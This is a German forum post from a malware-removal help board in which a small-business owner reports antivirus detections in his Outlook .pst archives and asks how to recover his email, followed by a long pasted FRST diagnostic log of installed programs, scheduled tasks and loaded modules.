Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: TR/Crypt.Xpack.41536 in der Outlook .pst

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

Antwort
Alt 15.01.2014, 10:27   #1
franz12
 
TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Hallo!

Bei Routine-Scans sind mir ein paar Dinge aufgefallen. Deswegen habe ich den PC mit der aktuellen Avira Rescue CD gebootet und scannen lassen. Dabei sind folgende Viren erkannt und dann umbenannt worden:

Outlook2003_mehr_gb pst -> TR/Crypt.Xpack.41536
archivoutlook2003_mehr_gb.pst -> WORM/Ntech.T
archiv1.pst -> TR/Crypt.ZPACK.Gen2
EXP.JAVA.Niabil.Gen

Hier weiß ich leider nicht, wie man das Avira Rescue CD Logfile speichert. Fotos vom Screen sind angefügt.

Danach habe ich Addition.txt, FRST.txt, defogger_disable.log und Gmer.log erstellt.
Und wieder danach habe ich einen Quickscan mit Malwarebytes durchgeführt und "entferne Auswahl" gewählt. Logs auch anbei.

Meine Fragen sind:
1)
Was wäre generell als nächstes zu tun?
2)
Wie kann ich die derzeit umgeschrieben Outlook-Dateien retten. Da sind alle meine E-Mails drin. Ggf. ist ja nicht die Datei an sich infiziert, sondern nur ein E-Mail Anhang darin. Solche Anhänge öffne ich sowieso nicht.

Ich bin ein Einzelunternehmer.

Vielen Dank!
Franz

Addition.txt
Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-01-2014
Ran by ***** at 2014-01-15 08:47:18
Running from G:\Users\*****\Documents\***\***** Hacker\trojaner-board.de
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Microsoft Security Essentials (Enabled - Up to date) {641105E6-77ED-3F35-A304-765193BCB75F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Enabled - Up to date) {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}

==================== Installed Programs ======================

 Update for Microsoft Office 2007 (KB2508958) (x32 Version:  - Microsoft)
3InternetManager (x32 Version: 3.0.0.141 - Hutchison 3G Austria GmbH)
Acer Arcade Deluxe (x32 Version: 3.2.7116 - CyberLink Corp.)
Acer Arcade Deluxe (x32 Version: 3.2.7116 - CyberLink Corp.) Hidden
Acer Backup Manager (x32 Version: 2.0.2.19 - NewTech Infosystems)
Acer eRecovery Management (x32 Version: 4.05.3005 - Acer Incorporated)
Acer GameZone Console (x32 Version: 5.1.0.2 - Oberon Media, Inc.)
Acer Registration (x32 Version: 1.02.3006 - Acer Incorporated)
Acer ScreenSaver (x32 Version: 1.1.0812 - Acer Incorporated)
Acer Updater (x32 Version: 1.01.3017 - Acer Incorporated)
Acrobat.com (x32 Version: 1.6.65 - Adobe Systems Incorporated)
Acronis*True*Image*Home (x32 Version: 11.0.8010 - Acronis)
Adobe Acrobat 7.0 Professional - English, Français, Deutsch (x32 Version: 7.1.0 - Adobe Systems) Hidden
Adobe AIR (x32 Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 1.5.3.9130 - Adobe Systems Inc.) Hidden
Adobe Bridge 1.0 (x32 Version: 001.000.004 - Adobe Systems)
Adobe Common File Installer (x32 Version: 1.00.001 - Adobe System Incorporated) Hidden
Adobe Creative Suite 2 (x32 Version:  - )
Adobe Flash Player 11 ActiveX (x32 Version: 11.9.900.117 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (x32 Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe GoLive CS2 (x32 Version: 8.0.1 - Ihr Firmenname) Hidden
Adobe Help Center 1.0 (x32 Version: 1.0.1 - Adobe Systems) Hidden
Adobe Illustrator CS2 (x32 Version: 12.000.000 - Adobe Systems Inc.) Hidden
Adobe InDesign CS2 (x32 Version: 004.000.000 - Adobe Systems Incorporated) Hidden
Adobe Photoshop 6.0 (x32 Version: 6.0 - Adobe Systems, Inc.)
Adobe Photoshop CS2 (x32 Version: 9.0 - Adobe Systems, Inc.) Hidden
Adobe Photoshop Elements 8.0 (x32 Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop Elements 8.0 (x32 Version: 8.0 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.05) - Deutsch (x32 Version: 11.0.05 - Adobe Systems Incorporated)
Adobe Stock Photos 1.0 (x32 Version: 1.0.1 - Adobe Systems) Hidden
Adobe SVG Viewer 3.0 (x32 Version:  3.0 - Adobe Systems, Inc.)
Adobe Version Cue CS2 (x32 Version: 2.0.1 - Adobe Systems, Inc.) Hidden
Advanced File Organizer (x32 Version: 2.61 - SoftPrime Development)
Advertising Center (x32 Version: 0.0.0.2 - Nero AG) Hidden
AIR iPad (x32 Version: 01 - UNKNOWN) Hidden
AIR iPad (x32 Version: v.01 - UNKNOWN)
Akeeba eXtract Wizard 3.3 (x32 Version:  - Akeeba Developers)
Alice Greenfingers (x32 Version:  - Oberon Media)
Amazon MP3-Downloader 1.0.17 (x32 Version: 1.0.17 - Amazon Services LLC)
Amazonia (x32 Version:  - Oberon Media)
Any Video Converter 3.5.2 (x32 Version:  - Any-Video-Converter.com)
Apple Application Support (x32 Version: 2.3.2 - Apple Inc.)
Apple Mobile Device Support (Version: 6.0.1.3 - Apple Inc.)
Apple Software Update (x32 Version: 2.1.3.127 - Apple Inc.)
Audacity 1.2.6 (x32 Version:  - )
Audacity 1.3.13 (Unicode) (x32 Version:  - Audacity Team)
Audible Download Manager (x32 Version: 6.6.0.15 - Audible, Inc.)
Avery Wizard 4.0 (x32 Version: 4.0.201 - Avery)
Backup Manager Advance (x32 Version: 2.0.2.19 - NewTech Infosystems) Hidden
Bonjour (Version: 3.0.0.10 - Apple Inc.)
Brother MFL-Pro Suite MFC-6490CW (x32 Version: 1.0.1.0 - Brother Industries, Ltd.)
Bulk Rename Utility 2.7.1.2 (Version:  - TGRMN Software)
Bullzip PDF Printer 10.1.0.1871 (Version: 10.1.0.1871 - Bullzip)
CamStudio (x32 Version:  - )
Chicken Invaders 2 (x32 Version:  - Oberon Media)
ColorChecker Passport 1.0 (x32 Version:  - X-Rite)
Compatibility Pack für 2007 Office System (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
CSS Tab Designer v2.0 (x32 Version:  - OverZone Software)
Dairy Dash (x32 Version:  - Oberon Media)
DivX-Setup (x32 Version: 2.6.1.9 - DivX, LLC)
Dream Day First Home (x32 Version:  - Oberon Media)
Dropbox (HKCU Version: 2.4.11 - Dropbox, Inc.)
eBay Worldwide (x32 Version: 2.1.0901 - OEM)
Engraver 2.0. (x32 Version:  - )
Engraver 2.22 (64 Bit). (Version:  - )
Engraver 2.22. (x32 Version:  - )
Epson Easy Photo Print 2 (x32 Version: 2.2.4.0 - SEIKO EPSON CORPORATION)
Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser) (x32 Version: 1.00.0000 - SEIKO EPSON CORPORATION)
Epson Print CD (x32 Version: 2.05.00 - SEIKO EPSON CORPORATION)
Epson Stylus Photo R3000 Handbuch (x32 Version:  - )
Epson Stylus Photo R3000 Netzwerk-Handbuch (x32 Version:  - )
Epson Stylus Photo R3000 Printer Uninstall (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (x32 Version: 2.4j - SEIKO EPSON CORPORATION)
EpsonNet Setup 3.3 (x32 Version: 3.3b - SEIKO EPSON CORPORATION)
eSobi v2 (x32 Version: 2.0.4.000274 - esobi Inc.)
eSobi v2 (x32 Version: 2.0.4.000274 - esobi Inc.) Hidden
Farm Frenzy 2 (x32 Version:  - Oberon Media)
FileZilla Client 3.7.3 (x32 Version: 3.7.3 - Tim Kosse)
Firebird SQL Server - MAGIX Edition (x32 Version: 2.0.1.13 - MAGIX AG)
First Class Flurry (x32 Version:  - Oberon Media)
FlippingBook Publisher (x32 Version: 2.5.19 - FlippingBook) Hidden
FlippingBook Publisher Professional (x32 Version: 2.5.19 - FlippingBook)
Free CD to MP3 Converter (x32 Version:  - )
Free M4a to MP3 Converter 6.2 (x32 Version:  - ManiacTools.com)
Free YouTube to MP3 Converter version 3.11.20.423 (x32 Version: 3.11.20.423 - DVDVideoSoft Ltd.)
FRITZ!Fernzugang (Version: 1.2.3 - AVM Berlin)
Google Chrome (x32 Version: 31.0.1650.63 - Google Inc.)
Google Desktop (x32 Version: 5.9.1005.12335 - Google)
Google Earth Plug-in (x32 Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (x32 Version: 7.5.4805.320 - Google Inc.)
Google Update Helper (x32 Version: 1.3.22.3 - Google Inc.) Hidden
Granny In Paradise (x32 Version:  - Oberon Media)
gSyncit (x32 Version: 2.4.42 - Fieldston Software)
HappyFoto-Designer 4.4 (x32 Version:  - )
Hauppauge WinTV 7 (x32 Version: v7.0.30108 (CD 2.5c) - Hauppauge Computer Works)
Heroes of Hellas (x32 Version:  - Oberon Media)
HFSExplorer 0.21 (x32 Version: 0.21 - Catacombae Software)
Hotkey Utility (x32 Version: 2.05.3005 - Acer Incorporated)
HS3 2011 (x32 Version: 2011 (2011.04.002) - HS/3 Hotelsoftware GmbH & Co. KG)
Identity Card (x32 Version: 1.00.3002 - Acer Incorporated)
IETester v0.5.2 (remove only) (x32 Version: 0.5.2 - Core Services)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Inkscape 0.48.1  (x32 Version: 0.48.1 - )
Intel(R) Management Engine Components (x32 Version: 6.0.0.1179 - Intel Corporation)
Intel® Matrix Storage Manager (Version:  - Intel Corporation)
iTunes (Version: 11.0.1.12 - Apple Inc.)
Java 7 Update 45 (x32 Version: 7.0.450 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
JDownloader 0.9 (x32 Version: 0.9 - AppWork GmbH)
JMicron JMB36X Driver (x32 Version: 1.00.0000 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Kies (x32 Version: 1.4 - Ihr Firmenname)
Kies (x32 Version: 1.4 - Ihr Firmenname) Hidden
LAME v3.98.3 for Audacity (x32 Version:  - )
LinkChecker 8.4 (x32 Version:  - )
Macromedia Dreamweaver 8 (x32 Version: 8.0.0.2751 - Macromedia)
Macromedia Extension Manager (x32 Version: 1.7.270 - Ihr Firmenname)
Macromedia Fireworks 8 (x32 Version: 8.0.0.777 - Macromedia)
Macromedia Flash 8 (x32 Version: 8.00.0000 - Macromedia)
Macromedia Flash 8 Video Encoder (x32 Version: 1.00.0000 - Macromedia)
Macromedia FreeHand MXa (x32 Version: 11.0.1 - Macromedia)
MAGIX Screenshare 4.3.6.1987 (D) (x32 Version: 4.3.6.1987 - MAGIX AG)
MAGIX Video deluxe 15 8.0.0.62 (D) (x32 Version: 8.0.0.62 - MAGIX AG)
Merriam Websters Spell Jam (x32 Version:  - Oberon Media)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Antimalware Service DE-DE Language Pack (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (x32 Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft Corporation (Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Corporation (x32 Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Expression Design 4 (x32 Version: 7.0.20516.0 - Microsoft Corporation)
Microsoft Expression Design 4 (x32 Version: 7.0.20516.0 - Microsoft Corporation) Hidden
Microsoft Expression Encoder 4 (x32 Version: 4.0.1651.0 - Microsoft Corporation)
Microsoft Expression Encoder 4 (x32 Version: 4.0.1651.0 - Microsoft Corporation) Hidden
Microsoft Expression Encoder 4 Screen Capture Codec (x32 Version: 4.0.1651.0 - Microsoft Corporation)
Microsoft Expression Web 4 (x32 Version: 4.0.1303.0 - Microsoft Corporation)
Microsoft Expression Web 4 (x32 Version: 4.0.1303.0 - Microsoft Corporation) Hidden
Microsoft Expression Web 4 Service Pack 2 (x32 Version:  - Microsoft Corporation)
Microsoft LifeCam (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (x32 Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Language Pack 2007 - German/Deutsch (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (x32 Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office O MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (German) (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office SharePoint Designer 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office SharePoint Designer MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Standard 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Standard 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Suite Activation Assistant (x32 Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office X MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office XP Professional (x32 Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Security Client (Version: 4.4.0304.0 - Microsoft Corporation) Hidden
Microsoft Security Client DE-DE Language Pack (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (Version: 4.4.304.0 - Microsoft Corporation)
Microsoft Silverlight (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (x32 Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (x32 Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (x32 Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022.218 (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (x32 Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411 (x32 Version: 9.0.30411 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (x32 Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (x32 Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (x32 Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 26.0 (x86 de) (x32 Version: 26.0 - Mozilla)
Mozilla Maintenance Service (x32 Version: 26.0 - Mozilla)
Mozilla Thunderbird (3.1.9) (x32 Version: 3.1.9 (de) - Mozilla)
MSVCRT (x32 Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (x32 Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (x32 Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (x32 Version: 3.1.76.0 - Egis Technology Inc.)
Nero 9 Essentials (x32 Version:  - Nero AG)
Nero ControlCenter (x32 Version: 9.0.0.1 - Nero AG) Hidden
Nero DiscSpeed (x32 Version: 5.4.7.201 - Nero AG) Hidden
Nero DiscSpeed Help (x32 Version: 5.4.4.100 - Nero AG) Hidden
Nero DriveSpeed (x32 Version: 4.4.7.201 - Nero AG) Hidden
Nero DriveSpeed Help (x32 Version: 4.4.4.100 - Nero AG) Hidden
Nero Express Help (x32 Version: 9.4.9.100 - Nero AG) Hidden
Nero InfoTool (x32 Version: 6.4.7.201 - Nero AG) Hidden
Nero InfoTool Help (x32 Version: 6.4.4.100 - Nero AG) Hidden
Nero Installer (x32 Version: 4.4.8.1 - Nero AG) Hidden
Nero Online Upgrade (x32 Version: 1.3.0.0 - Nero AG) Hidden
Nero StartSmart (x32 Version: 9.4.11.209 - Nero AG) Hidden
Nero StartSmart Help (x32 Version: 9.4.11.208 - Nero AG) Hidden
Nero StartSmart OEM (x32 Version: 9.16.0.100 - Nero AG) Hidden
NeroExpress (x32 Version: 9.4.10.505 - Nero AG) Hidden
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
Notepad++ (x32 Version: 5.9 - )
NVIDIA 3D Vision Treiber 311.06 (Version: 311.06 - NVIDIA Corporation)
NVIDIA Display Control Panel (Version: 6.14.11.9703 - NVIDIA Corporation)
NVIDIA Drivers (Version: 1.10.57.35 - NVIDIA Corporation)
NVIDIA Grafiktreiber 311.06 (Version: 311.06 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.108.688 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.10.0129 - NVIDIA Corporation)
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.13.1106 - NVIDIA Corporation) Hidden
NVIDIA Systemsteuerung 311.06 (Version: 311.06 - NVIDIA Corporation) Hidden
NVIDIA Update 1.11.3 (Version: 1.11.3 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.11.3 - NVIDIA Corporation) Hidden
OpenOffice.org 3.4 (x32 Version: 3.4.9590 - OpenOffice.org)
Outlook Backup Assistant 5 (Testversion) (x32 Version: 5.0 - Priotecs IT GmbH)
Paragon Backup & Recovery™ 2012 Free (x32 Version: 90.00.0003 - Paragon Software)
PC Connectivity Solution (x32 Version: 8.47.7.0 - Nokia)
PDFCreator (x32 Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Phase 5 HTML-Editor (x32 Version: 5.6.2.3 - Systemberatung Schommer)
Picasa 3 (x32 Version: 3.8 - Google, Inc.)
Poedit (x32 Version: 1.5.5 - Vaclav Slavik)
Realtek High Definition Audio Driver (x32 Version: 6.0.1.5969 - Realtek Semiconductor Corp.)
Safari (x32 Version: 5.33.19.4 - Apple Inc.)
SAMSUNG USB Driver for Mobile Phones (Version: 1.3.350.0 - SAMSUNG Electronics Co., Ltd.)
Samsung_MonSetup (x32 Version: 1.00.0000 - Samsung)
Skype™ 5.0 (x32 Version: 5.0.156 - Skype Technologies S.A.)
SmartCopy (x32 Version:  - Northstar Systems Corp.)
SmartLauncher (x32 Version:  - Northstar Systems Corp.)
Stellarium 0.12.4 (Version: 0.12.4 - Stellarium team)
StuffIt Expander 2011 (Version: 15.0.1.17 - Smith Micro Software, Inc.)
Suite Specific (x32 Version: 2.0.0 - Adobe Systems, Incorporated) Hidden
SUPER © v2012.build.53 (Sep 13, 2012) Version v2012.build.53 (x32 Version: v2012.build.53 - eRightSoft)
TeamViewer 9 (x32 Version: 9.0.24951 - TeamViewer)
TeraCopy 2.2 (Version:  - Code Sector Inc.)
Textmosaic Generator 1.10 (x32 Version: 1.10 - Philipp Winterberg)
TextPad 4.7 (x32 Version: 4.7.2 - Ihr Firmenname)
Thumbnail Generator by Disable Spyware (x32 Version:  - )
TightVNC 2.0.2 (x32 Version: 2.0.2 - GlavSoft LLC.)
Total Commander 64-bit (Remove or Repair) (Version: 8.0 - Ghisler Software GmbH)
Total Immersion D'Fusion @Home Web Plug-In (x32 Version:  - Total Immersion)
TrueCrypt (x32 Version: 7.0a - TrueCrypt Foundation)
TuxGuitar (x32 Version: 1.2 - Herac)
Überwachungstool für die Intel® Turbo-Boost-Technologie (Version: 1.0.115.11 - Intel)
UltraVnc (x32 Version: 1.0.9.62 - uvnc bvba)
Unlocker 1.9.1-x64 (Version: 1.9.1 - Cedrick Collomb)
Update for 2007 Microsoft Office System (KB967642) (x32 Version:  - Microsoft)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3) (x32 Version: 3 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2836939) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2836939v3) (x32 Version: 3 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2687493) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2850085) 32-Bit Edition (x32 Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (x32 Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (x32 Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (x32 Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (x32 Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Vista Buttons (x32 Version:  - )
VLC media player 2.0.1 (x32 Version: 2.0.1 - VideoLAN)
Vuze (x32 Version: 4.7 - Vuze Inc.)
Web Album Generator 1.8.2 (x32 Version:  - ornj.net)
Welcome Center (x32 Version: 1.00.3008 - Acer Incorporated)
Windows Home Server-Connector (Version: 6.0.3436.0 - Microsoft Corporation)
Windows Live Anmelde-Assistent (x32 Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Call (x32 Version: 14.0.8064.0206 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 14.0.8064.206 - Microsoft Corporation) Hidden
Windows Live Essentials (x32 Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Windows Live Fotogalerie (x32 Version: 14.0.8081.709 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 14.0.8091.0730 - Microsoft Corporation) Hidden
Windows Live Sync (x32 Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Writer (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live-Uploadtool (x32 Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Mobile-Gerätecenter (Version: 6.1.6965.0 - Microsoft Corporation)
Windows-Treiberpaket - Nokia pccsmcfd  (08/22/2008 7.0.0.0) (Version: 08/22/2008 7.0.0.0 - Nokia)
WinHTTrack Website Copier 3.46-1 (x32 Version: 3.46.1 - HTTrack)
WinRAR (Version:  - )
WinSCP 4.3.6 (x32 Version: 4.3.6 - Martin Prikryl)
Wisdom-soft AutoScreenRecorder 3.1 Pro (x32 Version:  - Wisdom Software Inc.)
Yahoo! Detect (x32 Version:  - )

==================== Restore Points  =========================

09-01-2014 05:51:11 Windows Update
12-01-2014 08:02:58 Windows Update

==================== Hosts content: ==========================

2009-07-14 03:34 - 2013-05-21 18:45 - 00000894 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {0DDD88D8-CFC7-4470-8DC6-EE036AD134CA} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {321EE57E-85B7-4405-9AEC-8BD4BB6EEE13} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-12-11] (Google Inc.)
Task: {5A7AFC4B-76FA-4646-9E49-7B290CBEDD4D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-12-11] (Google Inc.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2010-01-02 15:42 - 2010-01-02 15:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2010-12-20 22:15 - 2010-03-15 11:28 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2010-07-15 05:44 - 2010-07-15 05:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2010-12-20 11:12 - 2009-06-21 09:52 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2010-12-20 11:12 - 2009-06-22 05:27 - 00126464 _____ () C:\Program Files\TeraCopy\TeraCopy64.dll
2011-02-09 01:56 - 2011-02-09 01:56 - 00301568 _____ () C:\Program Files (x86)\Notepad++\NppShell_04.dll
2005-04-06 16:52 - 2005-04-06 16:52 - 00028791 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\hpi.dll
